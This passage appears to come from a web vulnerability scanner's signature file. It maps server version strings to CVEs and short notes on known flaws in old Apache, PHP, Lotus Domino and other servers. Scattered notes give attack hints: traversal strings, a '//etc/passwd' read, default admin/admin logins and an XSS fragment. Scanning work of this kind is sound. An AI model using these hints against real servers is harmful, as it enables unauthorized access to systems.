URL.\"\n\"800003\",\"4D_WebSTAR_S\\/5\\.3\\.1\",\"https://www.exploit-db.com/exploits/96\",\"4D_WebSTAR_S may be vulnerable to remote exploitable buffer overflow.\"\n\"800004\",\"Abyss\\/1\\.0\\.3\",\"CVE-2002-0543\",\"May be vulnerable to directory traversal by using '%5c%2e%2e%5c' type paths.\"\n\"800005\",\"ADSM_HTTP\\/\",\"\",\"May be Tivoli server administration. Default account is admin/admin.\"\n\"800006\",\"Acme.Serve/v1.7 of 13nov96\",\"http://www.acme.com/java/software/Acme.Serve.Serve.html\",\"Java class Acme.Serve.Serve is used as an embedded server for many devices, including APC InfraStruXure Manager. This server string is the default for the servlet. Check for port 9090, which may have a browsable c:\\ drive.\"\n\"800007\",\"AdSubtract\",\"\",\"Adsubtract.com, a Windows proxy which removes popup ads, can be configure for remote access or localhost only.\"\n\"800008\",\"Agranat-EMWeb\",\"\",\"Most likely a printer.\"\n\"800009\",\"alibaba\",\"https://www.tenable.com/plugins/nessus/10012\",\"Outdated Alibaba servers had multiple problems (overflows, etc)\"\n\"800010\",\"Allegro-Software-RomPager\",\"\",\"Most likely a printer.\"\n\"800011\",\"allegro-software\",\"\",\"Most often a printer or other embedded device\"\n\"800012\",\"american sitebuilder\",\"\",\"http://www.american.com/product1.html\"\n\"800013\",\"aolserver\",\"\",\"http://www.aolserver.com/ runs on Dec OSF1\"\n\"800014\",\"Apache Tomcat\\/4\\.(0\\.[1-4]|1\\.[0-9][^0-9]|1\\.10)\",\"CVE-2002-1148\",\"May be vulnerable to JSP source code exposure.\"\n\"800015\",\"Apache Tomcat\\/4\\.0\\.3\",\"CVE-2002-0935\",\"Apache Tomcat 4.0.3 Win 2000 server is vulnerable to a DoS attack. Upgrade to a 4.1.3beta or higher.\"\n\"800016\",\"apache-ssl-us\",\"\",\"http://apachessl.c2.net\"\n\"800017\",\"Apache\\/.* Ben-SSL\\/1\\.([0-9][^0-9]|[0-3][0-9]|4[0-6])[^0-9]\",\"\",\"This version of Apache-SSl is vulnerable to a buffer overflow.\"\n\"800018\",\"Apache\\/(1\\.2\\.([2-9].*|1[0-9])|1\\.3\\.([0-1].*|2[0-4]))\",\"CVE-2002-0392\",\"Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.\"\n\"800019\",\"Apache\\/1\\.0\\.3\",\"\",\"Probably a Xerox printer\"\n\"800020\",\"Apache\\/1\\.1\\.1\",\"\",\"May be able view directory contents regardless of index.html\"\n\"800021\",\"Apache\\/1\\.1\\.3\",\"CVE-1999-0071\",\"Apache 1.1.1 and below have a mod_cookies buffer overflow\"\n\"800022\",\"Apache\\/1\\.3\\.(0.*|1.*|2[0-6])\",\"CVE-2002-0839\",\"Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.\"\n\"800023\",\"Apache\\/1\\.3\\.(0.*|1.*|2[0-8])\",\"CVE-2003-0542\",\"Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.\"\n\"800024\",\"Apache\\/1\\.3\\.27\",\"CVE-2003-0460\",\"Windows and OS/2 version vulnerable to remote exploit.\"\n\"800025\",\"Apache\\/2\\.0\\.([0-2].*|3.*)\",\"CVE-2002-0661\",\"Apache 2.0 to 2.0.39 Windows may be vulnerable to arbitrary file retrieval.\"\n\"800026\",\"Apache\\/2\\.0\\.([0-2].*|3[0-8])\",\"CVE-2002-0392\",\"Apache 2.0 up 2.0.36 are vulnerable to a remote DoS and possible code execution.\"\n\"800027\",\"Apache\\/2\\.0\\.([0-3].*|4.[0-8])\",\"CVE-2003-0542\",\"Apache 2.0 to 2.0.48: overflows in mod_alias and mod_rewrite.\"\n\"800028\",\"Apache\\/2\\.0\\.([0-3].*|4[0-6])\",\"CVE-2003-0192, CVE-2003-0253, CVE-2003-0254, CERT VU#379828\",\"Apache 2.0 up 2.0.46 are vulnerable to multiple remote problems.\"\n\"800029\",\"Apache\\/2\\.0\\.([0-3].*|4[0-7])\",\"CVE-2003-0789. CVE-2003-0542, CVE-2003-0789\",\"Apache 2.0 up 2.0.47 are vulnerable to multiple remote problems in mod_rewrite and mod_cgi.\"\n\"800030\",\"Apache\\/2\\.0\\.([0-4].*|5\\.[0-1])\",\"CVE-2004-0786\",\"Apache 2.0 to 2.0.51 contain multiple problems: overflow in apr-util, config file variable overflow, indirect lock refresh DoS, SSL input filter DoS, potential infinite loop.\"\n\"800031\",\"Apache\\/2\\.0\\.([0-4].*|5\\.[0-2])\",\"CVE-2004-0811\",\"Apache 2.0 to 2.0.52 could allow bypassing of authentication via the Satisfy directive.\"\n\"800032\",\"Apache\\/2\\.0\\.([0-4].*|5\\.[0-3])\",\"CVE-2004-0885\",\"Apache 2.0 to 2.0.53 allows bypassing of an SSLCipherSuite setting, and a memory exhaustion DoS through MIME folded requests.\"\n\"800033\",\"Apache\\/2\\.0\\.([0-4].*|5\\.0)\",\"CVE-2004-0488, CVE-2004-0493\",\"Apache 2.0 to 2.0.50 contain a buffer overflow in FakeBasicAuth with trusted client certificates, and a DoS with certain input data.\"\n\"800034\",\"Apache\\/2\\.0\\.(3[7-9]|4[0-5])\",\"CVE-2003-0245\",\"Apache versions 2.0.37 through 2.0.45 are vulnerable to a DoS in mod_dav.\"\n\"800035\",\"Apache\\/2\\.0\\.[0-4].*\",\"CVE-2004-0113\",\"Apache 2.0 to 2.0.49: memory leak in plain-HTTP-on-SSL-port handling, a DoS with short-lived connections on rarely-accessed sockets, and may allow unescaped data into logfiles.\"\n\"800036\",\"Apache\\/2\\.0\\.4[0-5]\",\"CVE-2003-0189\",\"Apache versions 2.0.40 through 2.0.45 are vulnerable to a DoS in basic authentication.\"\n\"800037\",\"Apache\\/2\\.0\\.43\",\"CVE-2003-0016, CVE-2003-0017\",\"Win9x and ME servers allow arbitrary code execution, DoS and/or arbitrary file retrieval.\"\n\"800038\",\"Apache\\/2\\.0\\.44\",\"CVE-2003-0132\",\"Apache 2.0.44 is vulnerable to a DoS when linefeed characters are submitted consecutively.\"\n\"800039\",\"apachejserv\\/1\\.(0|1\\.[0-1])\",\"CVE-2001-0307\",\"This version of Apache JServ allows files to be retrieved and possibly executed from outside the web root.\"\n\"800040\",\"aserve\",\"\",\"http://www.phone.net/aws\"\n\"800041\",\"ATPhttpd\\/0\\.4\",\"https://seclists.org/bugtraq/2001/Dec/142\",\"ATPhttpd 0.4 contains a DoS by sending a GET 3000 chars long (many times).\"\n\"800042\",\"avenida\",\"\",\"http://www.avenida.co.uk/\"\n\"800043\",\"Avirt\",\"\",\"Check www.avirt.com for updates, some versions of the proxies have buffer overflows that allow attackers to run arbitrary commands.\"\n\"800045\",\"BadBlue\\/([0-1].*|2\\.[0-9]{1}|2\\.1[0-5]{1})\",\"https://www.exploit-db.com/exploits/22511\",\"BadBlue Web server 2.15 allow remote users to execute commands on the machine.\"\n\"800046\",\"BadBlue\\/(0\\..*|1\\.([0-6].*|7\\.0))\",\"CVE-2002-0800\",\"BadBlue Web server 1.7.0 and below allows directories to be listed by appending a unicode % to the end of a string.\"\n\"800047\",\"bkhttp\\/0.3\",\"https://securiteam.com/securitynews/5TP0D0K8UQ/\",\"BitKeeper may allow anyone to execute arbitrary commands on the remote system.\"\n\"800048\",\"Blazix\\/1\\.2\\.1\",\"\",\"Can view JSP source by appending a + to the end of the request.\"\n\"800049\",\"boa\",\"\",\"http://www.boa.org/\"\n\"800050\",\"boulevard\",\"\",\"http://www.resnova.com/boulevard\"\n\"800051\",\"Brickserver Modifications\",\"\",\"May be vulnerable to %2f type directory listing vulnerabilities if the directory contains an index.shtml but not index.html file.\"\n\"800052\",\"cpaneld\",\"\",\"This is a web hosting manager. It should not be running unless required, as it allows web server administration.\"\n\"800053\",\"cern\",\"\",\"http://www.w3.org/hypertext/WWW/Daemon\"\n\"800054\",\"ChaiServer\",\"\",\"HP printer.\"\n\"800055\",\"Cherokee\\/0\\.2\\.7\",\"http://www.securitytracker.com/alerts/2001/Dec/1003074.html\",\"This version of Cherokee allows arbitrary files to be retrieved remotely.\"\n\"800056\",\"cisco ios\",\"\",\"Cisco Catalyst Switch\"\n\"800057\",\"cisco-CPA\",\"\",\"Most likely a router/switch web management port\"\n\"800058\",\"cl-http\",\"\",\"http://www.ai.mit.edu/projects/iiip/doc/cl-http/home-page.html\"\n\"800059\",\"Cobalt\",\"\",\"Cobalt RaQ system\"\n\"800060\",\"commerce-builder\",\"\",\"http://www.ifact.com/\"\n\"800061\",\"CompaqHTTPServer\",\"\",\"Has had a few remote DoS issues. Can also give a lot of system information, especially if anonymous access enabled.\"\n\"800062\",\"cosmos\",\"\",\"http://www.ris.fr/\"\n\"800063\",\"DeleGate\\/\",\"\",\"www.globalintersec.com has found multiple vulnerabilities in the DeleGate proxies and recommends using Squid or another proxy device as the author(s) have not fixed previous versions.\"\n\"800064\",\"DeleGate\\/7\\.7\\.[0-1]\",\"\",\"DeleGate 7.7.1 & 7.7.0 are vulnerable to CSS.\"\n\"800065\",\"dwhttpd\",\"\",\"Probably Sun Microsystem's AnswerBook server. v3.1a4, 4.0.2a7a and 4.1a6 have problems.\"\n\"800066\",\"dwhttpd\\/4\\.(0\\.2a7a|1a6)\",\"\",\"May allow unauthorized users to add administrators or view logs remotely.\"\n\"800067\",\"Embedded HTTP Server\",\"\",\"Likely this is a D-Link SoHo router.\"\n\"800068\",\"emwac\",\"\",\"http://emwac.ed.ac.uk/\"\n\"800069\",\"enterpriseweb\",\"\",\"http://www.beyond-software.com/products/eweb/eweb.html\"\n\"800070\",\"Eserv\\/2\\.97\",\"\",\"Server allows pass protected directories to be retrieved by prepending '/./' to it, i.e., http://server/./protected/, or directory listings by appending ?\"\n\"800071\",\"Essentia\\/2\\.1\",\"\",\"Essentia 2.1 is vulnerable to directory traversal problems with /../ type requests, along with a DoS on long (2000 chars) requests.\"\n\"800072\",\"Ews/\",\"\",\"Probably a printer.\"\n\"800073\",\"falcon\",\"\",\"May allow ../../ file system browsing\"\n\"800074\",\"fnord\",\"\",\"Win 32 platform\"\n\"800075\",\"Folkweb\",\"\",\"Win 32 platform\"\n\"800076\",\"frontier\",\"\",\"http://www.frontiertech.com/products/superweb.htm\"\n\"800077\",\"frontpage\",\"http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html\",\"Microsoft Frontpage contained many vulnerabilities.\"\n\"800078\",\"^ghttpd\\/1\\.[0-4]\",\"\",\"The Ghttpd server may contain a remote buffer overflow. Upgrade to the latest version.\"\n\"800079\",\"glaci\",\"\",\"Netware web server\"\n\"800081\",\"GoAhead-Webs\\/2\\.(0.*|1)\",\"CVE-2002-1951\",\"GoAhead-Webs 2.1 and below is vulnerable to command execution through a buffer overflow.\"\n\"800082\",\"Gordian Embedded\",\"\",\"Lantronix device, may give system/networking information freely. Could be an access badge reader/card swipe.\"\n\"800083\",\"goserve\",\"\",\"http://www2.hursley.ibm.com/goserve\"\n\"800084\",\"gosite\",\"\",\"http://www.gosite.com/\"\n\"800085\",\"GWS\\/\",\"\",\"Could be the Google Web Server. 2.0 seems to be current.\"\n\"800086\",\"hellbent java webserver v0.1\",\"\",\"This version of the server is vulnerable to a path disclosure bug and can allow attackers to view .prefs files under certain circumstances. Upgrade to 0.11 or higher.\"\n\"800087\",\"homedoor\",\"\",\"http://www.opendoor.com/\"\n\"800088\",\"HP-Web-Server\",\"\",\"HP Printer\"\n\"800089\",\"hyperwave\",\"\",\"http://www.hyperwave.com/\"\n\"800090\",\"i\\/net\",\"\",\"http://www.inetmi.com/\"\n\"800091\",\"ibm internet connection server\",\"\",\"http://www.ics.raleigh.ibm.com\"\n\"800092\",\"IBM-HTTP-Server\\/1\\.0\",\"\",\"This IBM web server allows file source to be viewed by adding a '/' to the URI, like http://server/index.jsp/\"\n\"800093\",\"icecast/1\\.3\\.(7|8.*beta[0-2])\",\"\",\"This version of Icecast may allow an attacker to execute commands on the server with a format string attack.\"\n\"800094\",\"iis\\/4\",\"\",\"May be able to bypass security settings using 8.3 file names. ESB-98.015.\"\n\"800095\",\"Intrusion\\/\",\"\",\"The server may be running Tripwire for web pages. This can allow attackers to gain sensitive information about the web setup.\"\n\"800096\",\"Ipswitch-IMail\\/7\\.11\",\"https://seclists.org/bugtraq/2002/Jul/363\",\"May be vulnerable to a remote command execution overflow.\"\n\"800097\",\"Jaguar Server\",\"\",\"Probably a Sybase web interface\"\n\"800098\",\"jakarta-tomcat-4.0.1\",\"\",\"Server will reveal path\"\n\"800099\",\"JavaWebServer\",\"\",\"Probably Sun Microsystem's servlet interface. May have default code which is exploitable. Try admin/admin for id/password.\"\n\"800100\",\"JetAdmin\",\"\",\"HP Printer\"\n\"800101\",\"Jeus WebContainer\\/([0-3]\\.[0-2]\\..*)\",\"\",\"JEUS below 3.2.2 is vulnerable to XSS if a nonexistent url is requested, i.e. [victim site]/[javascript].jsp\"\n\"800102\",\"Jigsaw\\/([0-1].*|2\\.([0-1].*|2\\.0))\",\"\",\"Jigsaw 2.1.0 or below may be vulnerable to XSS if a nonexistent host name is requested, i.e. nosuchhost.domain.com/<script>...\"\n\"800103\",\"Jigsaw\\/2\\.2\\.1\",\"\",\"Jigsaw 2.1.1 on Windows may be tricked into revealing the system path by requesting /aux two times.\"\n\"800104\",\"JRun\\/([0-3]\\..*|4\\.0)\",\"CVE-2002-2187\",\"JRun 4.0 and below on IIS is vulnerable to remote buffer overflow with a filename over 4096.\"\n\"800105\",\"JRun\\/3\\.1\",\"\",\"JRun 3.1 on Windows NT/2000 is vulnerable to remote buffer overflow in the Host header field that can allow attackers to exploit the system.\"\n\"800106\",\"KazaaClient\",\"https://securiteam.com/securitynews/5UP0L2K55W/\",\"Kazaa may allow sensitive information to be retrieved.\"\n\"800107\",\"LabVIEW\\/(5\\.[1-9]|6\\.[0-1])\",\"\",\"LabVIEW 5.1.1 to 6.1 is vulnerable to a remote DoS by sending a malformed GET request. This DoS was not attempted.\"\n\"800108\",\"Lasso\\/3\\.6\\.5\",\"\",\"This version of Blueworld WebData engine is vulnerable to DoS by sending a 1600 character long GET request.\"\n\"800109\",\"LilHTTP\\/2\\.1\",\"\",\"LilHTTP server 2.1 allows password protected resources to be retrieved by prepending '/./' to the url.\"\n\"800110\",\"LocalWeb2000\\/([0-1]\\.*|2\\.(0\\.*|1\\.0))\",\"\",\"LocalWeb2000 2.1.0 and below allow protected files to be retrieved by prepending the request with /./\"\n\"800111\",\"Lotus-Domino\\/([0-3].*|4\\.([0-1].*|2\\.([0-1].*|3)))\",\"\",\"This version of Lotus-Domino server has had multiple vulnerabilities.\"\n\"800112\",\"Lotus-Domino\\/4\\.[5-6]\",\"CVE-2003-0123\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever.\"\n\"800113\",\"Lotus-Domino\\/5\",\"CVE-2003-0123\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever.\"\n\"800114\",\"Lotus-Domino\\/5\\.0\\.9\",\"\",\"This version of Lotus-Domino server is vulnerable to a DoS via requesting DOS devices\"\n\"800115\",\"Lotus-Domino\\/6b.*\",\"CVE-2003-0123\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever.\"\n\"800116\",\"Lotus-Domino\\/Release-([0-3].*|4\\.([0-1].*|2\\.([0-1].*|3)))\",\"CVE-2003-0123\",\"This version of Lotus-Domino server has had multiple vulnerabilities.\"\n\"800117\",\"Lotus-Domino\\/Release-4\\.[5-6]\",\"\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever.\"\n\"800118\",\"Lotus-Domino\\/Release-5\",\"CVE-2003-0123\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever.\"\n\"800119\",\"Lotus-Domino\\/Release-5\\.0\\.9\",\"\",\"This version of Lotus-Domino server is vulnerable to a DoS via requesting DOS devices\"\n\"800120\",\"Lotus-Domino\\/Release-6b*\",\"CVE-2003-0123\",\"This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever.\"\n\"800121\",\"machttp\",\"\",\"http://www.starnine.com/machttp may let you download log files\"\n\"800122\",\"mathopd\",\"\",\"http://mathop.diva.nl/\"\n\"800123\",\"MegaTime Chart Server\",\"\",\"Server returns a .png file for all requests, all results should be validated as false-positives are likely.\"\n\"800124\",\"micro-http/\",\"\",\"Probably a printer (Tektronix?).\"\n\"800125\",\"MiniServ\",\"\",\"This is the Webmin Unix administrator. It should not be running unless required.\"\n\"800126\",\"mod_auth_mysql\\/((0\\..*)|(1\\.[0-9]$))\",\"\",\"This version allows an SQL insertion attack that could allow attackers to execute arbitrary SQL commands.\"\n\"800127\",\"mod_auth_oracle\\/0\\.(([0-4].*)|(5\\.[0-1].*))\",\"\",\"This version allows an SQL insertion attack that could allow attackers to execute arbitrary SQL commands.\"\n\"800128\",\"mod_auth_pgsql_sys\\/0\\.(([0-8]\\..*)|(9\\.[0-4].*))\",\"\",\"This version allows an SQL insertion attack that could allow attackers to execute arbitrary SQL commands.\"\n\"800129\",\"mod_auth_pgsql\\/0\\.(([0-8]\\..*)|(9\\.[0-5].*))\",\"\",\"This version allows an SQL insertion attack that could allow attackers to execute arbitrary SQL commands.\"\n\"800130\",\"mod_python\\/(1.*|2\\.([0-6]\\..*|7\\.[0-6]))\",\"\",\"mod_python 2.7.6 or older may allow attackers to execute functions remotely.\"\n\"800131\",\"mod_security\\/1\\.7([0-1]|RC.*)\",\"CVE-2003-1171\",\"mod_security 1.7RC1 to 1.7.1 are vulnerable to a buffer overflow. Upgrade to 1.7.2 or higher.\"\n\"800132\",\"mod_ssl\\/(1.*|2\\.([0-7]\\..*|8\\.[0-6]))\",\"CVE-2002-0082\",\"mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.\"\n\"800133\",\"mod_survey\\/[0-3]\\.0\\.((9|1[0-3])|(14[a-d])|(15\\-pre[0-5]))\",\"\",\"mod_survey is vulnerable to a remote buffer overflow. It should be upgraded to the latest version.\"\n\"800134\",\"mofet simple\",\"\",\"Mofet Simple HTTP Server, often an embedded device like a Nortel MIPCD\"\n\"800135\",\"Monkey\\/0\\.([0-5].*|6\\.[0-2]{1})\",\"CVE-2003-0218\",\"Monkey server is vulnerable to a remote buffer overflow.\"\n\"800136\",\"MS-MFC-HttpSvr/1.0\",\"CVE-2002-0705, CVE-2002-0706, CVE-2002-0707, CVE-2002-0708, CVE-2002-0709\",\"Server and Surfcontrol software has multiple remote vulnerabilities.\"\n\"800137\",\"myCIO\",\"\",\"The McAfee myCIO server provides antivirus updates to clients. This server has had multiple vulnerabilities in the past.\"\n\"800138\",\"Mylo/0\\.([0-1]|2\\.[0-1])\",\"\",\"mod_mylo may be vulnerable to a remote buffer overflow. Upgrade to the latest version. CVE‑2003‑0651.\"\n\"800139\",\"MyServer 0\\.([0-3]\\..*|4\\.[0-2])\",\"\",\"MyServer versions lower than 0.5 contain multiple remote vulnerabilities.\"\n\"800140\",\"MyWebServer\\/(0\\.*|1\\.0[0-2])\",\"\",\"MyWebServer versions 1.02 and below are vulnerable to a DoS by requesting a url of approximately 1000 characters.\"\n\"800141\",\"ncsa\",\"\",\"lower than v1.3 have multiple issues\"\n\"800142\",\"neowebscript\",\"\",\"Apache plugin to allow TCL use\"\n\"800143\",\"netcloak\",\"\",\"http://www.maxum.com plugin for webstar\"\n\"800144\",\"netpresenz\",\"\",\"http://www.stairways.com/netpresenz\"\n\"800145\",\"NetWare\",\"\",\"Novell Netware web server identified.\"\n\"800146\",\"nsl\",\"\",\"http://www.nsl.net/\"\n\"800147\",\"NULLhttpd\\/0\\.5\\.1\",\"\",\"NULLhttpd may allow a system DoS if a client says it will send an amount of data, then sends one byte less. This will cause the server to hold that data in memory and wait for the last byte.\"\n\"800149\",\"OmniHTTPd\\/2\\.0\\.8\",\"\",\"This version contains a source disclosure vulnerability (append %20 to request). Upgrade to the latest.\"\n\"800150\",\"OmniHTTPd\\/2\\.0\\.9\",\"\",\"This version contains a remote denial of service if more than 4096 characters are used as the HTTP version in a request. Upgrade to the latest.\"\n\"800151\",\"open-market-secure-webserver\",\"\",\"http://www.openmarket.com/products/secureweb.html\"\n\"800152\",\"open-market-webserver\",\"\",\"http://www.openmarket.com/products/webserver.html\"\n\"800153\",\"Oracle Applications One-Hour Install\",\"\",\"The Oracle Applications One-Hour Install allows remote users to administer the database. It should not be used unless absolutely required.\"\n\"800154\",\"Oracle_Web_Listener\",\"\",\"The Oracle Web Listener allows remote users to administer the database. It should not be used unless absolutely required.\"\n\"800155\",\"os2httpd\",\"\",\"http://ftp.netcom.com/pub/kf/kfan/overview.html\"\n\"800156\",\"osu\",\"\",\"http://kcgl1.eng.ohio-state.edu/www/doc/serverinfo.html\"\n\"800157\",\"PHP\\/([0-3].*|4\\.[0-2].*|4\\.3\\.[0-2])\",\"\",\"PHP below 4.3.3 may allow local attackers to safe mode and gain access to unauthorized files. CVE‑2003‑0863.\"\n\"800158\",\"PHP\\/[0-3]\\.\",\"\",\"Old versions of PHP contain multiple buffer overflows and remote exploit problems. Server should be upgraded to the latest version.\"\n\"800159\",\"PHP\\/4\\.0\\.([2-5])\",\"\",\"PHP 4.1.1 is vulnerable to remote exploits and must be upgraded.\"\n\"800160\",\"PHP\\/4\\.0\\.(1|3pl1)\",\"https://web.archive.org/web/20020522152105/http://archives.neohapsis.com/archives/vulnwatch/2002-q1/0054.html\",\"PHP 4.0.1 or 4.0.3pl is vulnerable to remote exploits and should be upgraded.\"\n\"800161\",\"PHP\\/4\\.0\\.(6|7)(RC2)?\",\"\",\"PHP 4.06 to 4.07RC3 are vulnerable to remote exploits and must be upgraded.\"\n\"800162\",\"PHP\\/4\\.0\\.[0-3]\",\"\",\"This version of PHP contains a buffer overflow in the IMAP module. Upgrade to the latest version.\"\n\"800163\",\"PHP\\/4\\.0\\.5\",\"\",\"This version of PHP allows attackers to override safe mode and obtain the HTTP uid\"\n\"800164\",\"PHP\\/4\\.1\\.1\",\"\",\"PHP 4.1.1 is vulnerable to remote exploits and must be upgraded.\"\n\"800165\",\"PHP\\/4\\.2\\.[0-1]\",\"\",\"PHP 4.2.0 and 4.2.1 are vulnerable to local and remote DoS attacks to both PHP and to the web server. Some platforms have remove command execution problems as well.\"\n\"800166\",\"PHP\\/4\\.2\\.0\",\"\",\"PHP 4.2.0 is vulnerable to exploit via invalid checking of posix_getpwuid and posix_getpwnam.\"\n\"800167\",\"phttpd\",\"\",\"http://www.signum.se/phttpd\"\n\"800168\",\"PI\\/7\\.[0-4]\",\"\",\"InfronTech WebTide 7.0 to 7.4 allow directory listings by sending a request like '%3f.jsp'.\"\n\"800169\",\"Pi3Web\\/2\\.0\",\"CVE-2002-0142\t\",\"Pi3Web server may crash after sending very long parameters a few times.\"\n\"800170\",\"plexus\",\"\",\"http://www.bsdi.com/server/doc/plexus.html\"\n\"800171\",\"powerweb\",\"\",\"http://www.compusource.co.za/powerweb\"\n\"800172\",\"process\",\"\",\"http://www.process.com/\"\n\"800173\",\"PWS\",\"\",\"Personal Web Server. requesting /....../ might give root drive list.\"\n\"800174\",\"pws\\/4\",\"\",\"May be able to bypass security settings using 8.3 file names.\"\n\"800175\",\"RapidLogic\",\"\",\"Embedded device\"\n\"800176\",\"Resin\\/1\",\"\",\"Resin web server may allow attackers to read any file on the server by requesting files like '\\..\\..\\file.txt'.\"\n\"800177\",\"Resin\\/2\\.1\\.1\",\"\",\"Resin 2.1.1 is vulnerable to a remote denial of service by defining large variables when requesting non-existent resources.\"\n\"800178\",\"roxen\",\"\",\"http://www.roxen.com/\"\n\"800179\",\"rushhour\",\"\",\"http://www.maxum.com/RushHour\"\n\"800180\",\"sambar\\/(5\\.|6\\.(0|1|2[^.]))\",\"https://web.archive.org/web/20051121180931/http://secunia.com/advisories/15465/\",\"This version of Sambar is vulnerable to XSS attacks.\"\n\"800181\",\"sambar\\/(5\\.|6\\.0[^0-9])\",\"\",\"This version of Sambar contains multiples flaws, http://secunia.com/advisories/9578/\"\n\"800182\",\"sambar\\/5\\.1\",\"\",\"Sambar version 5.1 is vulnerable to source viewing by adding a +%00 to cgi requests.\"\n\"800183\",\"Savant\",\"\",\"Versions of Savant older than 3.0 can be crashed by requesting 'GET /%%% HTTP/1.0'\"\n\"800184\",\"Savant\\/3\\.0\",\"\",\"Savant 3.0 (Windows) is vulnerable to a remote DoS by sending very long CGI parameters multiple times. Upgrade to a version higher than 3.0.\"\n\"800185\",\"Savant\\/3\\.1\",\"\",\"Savant 3.1 (Windows) is vulnerable to a DoS by sending a GET request containing a URL of approx. 291 characters or more.\"\n\"800186\",\"ScriptEase\\/0\\.95\",\"CVE-2002-0298\",\"ScriptEase v0.95 is vulnerable to a DoS if a 2000 character file is requested.\"\n\"800187\",\"serverseven\",\"\",\"Win 32 platform (pascal)\"\n\"800188\",\"SetiQueue\\/\",\"\",\"This is a SETI@Home work-unit queue server, proxy, and web server, http://www.reneris.com/seti/default.asp.\"\n\"800189\",\"Simple, Secure Web Server 1.1\",\"\",\"Likely a Raptor firewall (which may answer to protect the web server from an invalid request).\"\n\"800190\",\"SimpleWebserver\\/2\\.([0-9]|1\\.[0-2])\",\"\",\"TelCondex SimpleWebserver 2.12.30210 Build 3285 is vulnerable to a buffer overflow if 704 bytes are sent in the referrer header. Upgrade to 2.13 or higher.\"\n\"800191\",\"SimpleWebserver\\/SimpleWebserver\\/([0-1].*|2\\.(0.*|[0-9]{1}\\..*|(10|11|12)\\..*|13\\.[0-2].*|13\\.310([0-1].*|2[0-7])))\",\"\",\"TelCondex Simpleserver 2.13.31027 Build 3289 and below allow directory traversal with '/.../' entries.\"\n\"800192\",\"SiteScope Administrator\",\"\",\"The SiteScope Administrator allows SiteScope configuration if not password protected or if a valid account can be found.\"\n\"800193\",\"Specialix JETSTREAM\",\"\",\"Probably a printer.\"\n\"800194\",\"spinnaker\",\"\",\"http://www.telegrafix.com/\"\n\"800195\",\"spry\",\"\",\"http://wsk.eit.com/\"\n\"800196\",\"Squid\\/2\\.[0-4]\",\"\",\"The Squid proxy may be vulnerable to an FTP buffer overflow.\"\n\"800197\",\"Squid\\/2\\.[3-4]\\..*(STABLE[1-4]|DEVEL(2|4))\",\"\",\"The Squid server may be vulnerable to a PUT request DoS. Also may have SNMP/FTP/HTCP vuls if running.\"\n\"800198\",\"Statistics Server\",\"\",\"Statistics Server versions lower than 5.03 are vulnerable to a remote command execution flaw.\"\n\"800199\",\"Storage\",\"\",\"Try to login with 'admin' or 'monitor'\"\n\"800200\",\"StorageTek\",\"\",\"Try to login with 'admin' or 'monitor'\"\n\"800201\",\"Stronghold\",\"\",\"May be a Big IP (load balancer) admin interface.\"\n\"800202\",\"Sun_WebServer\",\"\",\"Solaris Management Console (SMC)\"\n\"800203\",\"Teamtrack\",\"https://github.com/sullo/advisory-archives/blob/master/RFP9904.txt\",\"May allow ../../../ directory listing.\"\n\"800204\",\"telefinder\",\"\",\"http://bbs.spiderisland.com/\"\n\"800205\",\"thttpd\\/2\\.0\\.[123]\",\"http://www.acme.com/software/thttpd\",\"thttpd v2.03 lets reading of system files by adding // like //etc/passwd.\"\n\"800148\",\"thttpd\\/2\\.0\\.4\",\"http://www.acme.com/software/thttpd\",\"thttpd 2.04 has a buffer overflow in 'If-Modified-Since' header.\"\n\"800206\",\"thttpd\\/2\\.20b\",\"\",\"thttpd 2.20b is vulnerable to cross site scripting in error messages.\"\n\"800207\",\"tivo-httpd\",\"\",\"Tivo server allows Tivo DVRS and comps to download video from the Tivo to a desktop. User ID is 'tivo' and pass is the Media Access Key (MAK)\"\n\"800208\",\"Tivo\",\"\",\"TiVo Calypso Server allows TiVo DVRs to talk to computers to download music and video via an HTTP web server on port 8101.\"\n\"800209\",\"tme_10_netview_vs\",\"\",\"Tivoli web manager\"\n\"800210\",\"Ultraseek\",\"\",\"The Ultraseek server has had multiple buffer overflows and cross site scripting vuls. Make sure the latest version is being run.\"\n\"800211\",\"viking\",\"\",\"http://www.robtex.com/viking/\"\n\"800212\",\"VisualRoute\",\"\",\"VisualRoute web servers allow remote users to perform traceroutes to third parties while remaining anonymous. This should not be run without proper protection.\"\n\"800213\",\"vm\\:webserver\",\"\",\"http://www.vm.sterling.com/\"\n\"800214\",\"vqserver\",\"\",\"version 1.9.9 and below have remote file read vulnerability, http://www.vqsoft.com/\"\n\"800215\",\"w4\",\"\",\"http://130.89.224.16/\"\n\"800216\",\"web commander\",\"\",\"http://www.luckman.com/wc/webcom.html\"\n\"800217\",\"web server 4d\",\"\",\"http://www.mdg.com/\"\n\"800218\",\"Web_Server_4D\\/3\\.5\\.3\",\"CVE-2002-0124\",\"Vulnerable to a DoS and a directory traversal problem.\"\n\"800219\",\"Web4All\\/1\\.2\\.8\",\"\",\"Web Server 4 Everyone may be vulnerable to a remote DoS if 2000 characters are requested.\"\n\"800220\",\"Web4Everyone\\/1\\.2\\.8\",\"\",\"Web Server 4 Everyone may be vulnerable to a remote DoS if 2000 characters are requested.\"\n\"800221\",\"webdisk\",\"\",\"http://www.ararat.com/\"\n\"800222\",\"webforone\",\"\",\"http://www.resnova.com/webforone\"\n\"800223\",\"WebLogic.*6\\.0.*(SP(1.*|2 [^R].*))\",\"https://seclists.org/vulnwatch/2003/q1/133,https://securitytracker.com/id/1008160\",\"Weblogic may be vulnerable to multiple remote problems.\"\n\"800224\",\"WebLogic.*6\\.1.*(SP([1-3].*|[^4-9].*))\",\"https://seclists.org/vulnwatch/2003/q1/133,https://securitytracker.com/id/1008160\",\"Weblogic may be vulnerable to multiple remote problems.\"\n\"800225\",\"WebLogic.*7\\.0.(\\.0\\.1)?.*(SP[^2-9])?\",\"https://seclists.org/vulnwatch/2003/q1/133,https://securitytracker.com/id/1008160\",\"Weblogic may be vulnerable to multiple remote 